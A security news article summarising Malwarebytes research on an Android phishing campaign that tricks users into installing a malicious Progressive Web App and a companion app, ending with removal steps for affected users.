Attackers are abusing Progressive Web Apps (PWAs) on Android

Victims lured via phishing site google-prism[dot]com into installing malicious PWA

PWA harvests clipboard, crypto wallets, OTPs, GPS, and more

Threat actors have begun turning to Progressive Web Apps (PWA) to do their evil bidding on Android, stealing login credentials, cryptocurrency wallet data, GPS information, and more, experts have warned.

Security researchers from Malwarebytes recently detailed one such campaign they spotted in the wild, starting with a phishing email, luring people to a fake Google site google-prism[dot]com.

Under the pretense of enhanced security, the victims are walked through a four-step “security” check that includes installing a malicious PWA.

Harvesting the data

For those unaware of PWAs, these are websites that can be installed and run like regular apps on the device but operate through the web browser.

Once installed, the PWA asks for permissions to send notifications, access clipboard data, and other browser features, and sets up a service worker to enable push notifications, background tasks, and data staging.

At this point, the malware starts collecting data whenever the app is open. Clipboard contents, cryptocurrency wallet addresses, one-time passwords via the WebOTP API, contacts, GPS data, and device fingerprinting details, are all being harvested. But since the information can be gathered only while the app is open, the PWA will start sending push notifications to the victim, as well.

The PWA would also establish a WebSocket-based relay and HTTP proxy capability, so that the attackers can route web requests, scan internal networks, and even access local resources.

In some cases, Malwarebytes said, the victim is also encouraged to download a “companion app” advertised as a “critical security update” which requests extensive permissions and registers as a device administrator.

This app, obviously for the more gullible ones, enables deeper compromise, including SMS interception, keystroke capture via a custom keyboard, notification monitoring, credential theft, and long-term persistence.

If, by any chance, you’ve installed such an app, you can remove it by looking for a “Security Check” entry in the list of installed apps. If your device has an app called “System Service” with a package name com.device.sync, and if it has admin access, remove the access by going to Settings - Security - Device admin apps, and then uninstall it.

